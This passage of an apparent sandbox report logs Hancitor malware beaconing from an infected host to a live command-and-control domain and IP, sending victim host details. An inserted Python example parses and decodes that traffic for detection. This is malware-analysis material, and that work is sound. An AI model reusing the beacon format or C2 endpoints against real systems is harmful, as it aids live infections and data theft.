                              Data Raw: 63 0d 0a 56 47 54 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVGTEARRABw==0


                              Session ID: 69 | Source: 192.168.2.3:49796 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:58.327851057 CEST | 5466 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.397506952 CEST | 5467 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cBJQYARRABw==0


                              Session ID: 7 | Source: 95.213.179.67:80 | Destination: 192.168.2.3:49727 | Process: C:\Windows\SysWOW64\svchost.exe
                              Timestamp | kBytes transferred | Direction | Data
                              (no HTTP data recorded for this session)


                              Session ID: 70 | Source: 192.168.2.3:49797 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:58.346272945 CEST | 5467 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.412498951 CEST | 5467 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:59 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 56 45 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTVEGARRABw==0


                              Session ID: 71 | Source: 192.168.2.3:49798 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:58.691080093 CEST | 5468 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.761250973 CEST | 5470 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCCXXARRABw==0


                              Session ID: 72 | Source: 192.168.2.3:49800 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:58.732633114 CEST | 5469 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.804646015 CEST | 5471 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 48 53 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHHSSARRABw==0


                              Session ID: 73 | Source: 192.168.2.3:49799 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:58.732853889 CEST | 5470 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:58.803184032 CEST | 5470 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKAZPARRABw==0


                              Session ID: 74 | Source: 192.168.2.3:49802 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.115871906 CEST | 5472 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.186662912 CEST | 5474 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 41 5a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMAZNARRABw==0


                              Session ID: 75 | Source: 192.168.2.3:49801 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.116475105 CEST | 5472 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.188098907 CEST | 5474 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNMNMARRABw==0


                              Session ID: 76 | Source: 192.168.2.3:49803 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.121921062 CEST | 5473 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.186986923 CEST | 5474 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:00 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 43 58 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCCXXARRABw==0


                              Session ID: 77 | Source: 192.168.2.3:49804 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.522425890 CEST | 5475 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.591309071 CEST | 5477 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMZANARRABw==0


                              Session ID: 78 | Source: 192.168.2.3:49805 | Destination: 77.222.42.67:80 | Process: C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.522624016 CEST | 5476 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.591022015 CEST | 5477 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 51 4a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nZQJAARRABw==\r\n0\r\n\r\n

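Added example (not part of the Joe Sandbox output): the Python below takes the session 78 exchange shown above, splits the POST body into the beacon fields Hancitor sends (GUID, BUILD, INFO, EXT, IP, TYPE, WIN), reassembles the chunked HTTP response, and decodes the task string the C2 returned. The decoding step (discard the first four characters, base64-decode, XOR each byte with 0x7A) follows public Hancitor analyses and is an assumption of this example, not something this report states; applied to every response in this section it yields "{n:}", the empty "no task" reply. The URI pattern and the User-Agent/WIN comparison in indicators() are illustrative detection heuristics drawn from the traffic shown here, not rules from the report.

```python
"""Parse one Hancitor check-in exchange as captured in this report.

Added example, not sandbox output. Request/response bytes are copied
from session 78 above and embedded as literals so the script runs
offline. The task decoding constants are assumptions (see lead-in).
"""
import base64
import re
from urllib.parse import parse_qs

# Copied from session 78 (the Data Ascii rendering of the POST body).
REQUEST_LINE = "POST /8/forum.php HTTP/1.1"
REQUEST_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko",
    "Host": "sudepallon.com",
    "Content-Type": "application/x-www-form-urlencoded",
}
REQUEST_BODY = (b"GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\\user"
                b"&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)")
# The Data Raw bytes of the 200 OK body: chunk size 0xc, 12 bytes, terminating 0 chunk.
RESPONSE_BODY = bytes.fromhex("63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a")

XOR_KEY = 0x7A   # assumption: key used by public Hancitor decoders
SKIP = 4         # assumption: leading characters dropped before base64 decoding
CHECKIN_FIELDS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")
URI_RE = re.compile(r"^/\d+/forum\.php$")


def parse_checkin(body: bytes) -> dict:
    """Split the form-encoded beacon body into an ordered field -> value dict."""
    fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex size line, data, ..., 0 chunk."""
    out, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return out
        out += raw[pos:pos + size]
        pos += size + 2                                 # skip data and its CRLF


def decode_task(chunk_data: bytes) -> str:
    """Turn the base64 task string into Hancitor's {cmd:arg} text form."""
    decoded = base64.b64decode(chunk_data[SKIP:])
    return bytes(b ^ XOR_KEY for b in decoded).decode("latin-1")


def indicators(request_line: str, headers: dict, body: bytes) -> list:
    """Return the traits of this exchange a detection rule could key on."""
    hits = []
    path = request_line.split(" ")[1]
    if URI_RE.match(path):
        hits.append("uri:/<n>/forum.php")
    fields = parse_checkin(body)
    if tuple(fields) == CHECKIN_FIELDS:
        hits.append("body:hancitor-checkin-fields")
    ua_win = re.search(r"Windows NT ([\d.]+)", headers.get("User-Agent", ""))
    if ua_win and fields.get("WIN", "").split("(")[0] != ua_win.group(1):
        # The hard-coded UA claims NT 6.1 while the beacon reports WIN=10.0.
        hits.append("ua/WIN mismatch")
    return hits


if __name__ == "__main__":
    print(parse_checkin(REQUEST_BODY))
    print(decode_task(dechunk(RESPONSE_BODY)))
    print(indicators(REQUEST_LINE, REQUEST_HEADERS, REQUEST_BODY))
```

Feeding the other responses in this section through decode_task(dechunk(...)) gives the same "{n:}"; only the four discarded leading characters differ between replies.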

                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              79 | 192.168.2.3 | 49806 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.549141884 CEST | 5477 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.616100073 CEST | 5478 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 54 47 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nJTGQARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              8 | 192.168.2.3 | 49728 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:23.445317984 CEST | 677 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:23.511239052 CEST | 678 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:25 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nYTGBARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              80 | 192.168.2.3 | 49807 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.904531956 CEST | 5479 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.972100973 CEST | 5481 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nVBYEARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              81 | 192.168.2.3 | 49808 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.904548883 CEST | 5479 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:59.971338034 CEST | 5480 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:12:01 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii (chunked body, CRLF shown as \r\n): c\r\nKHSPARRABw==\r\n0\r\n\r\n


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              82 | 192.168.2.3 | 49809 | 77.222.42.67 | 80 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 9, 2021 03:11:59.959167957 CEST | 5480 | OUT | POST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:12:00.024425983 CEST | 5481 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.20.1
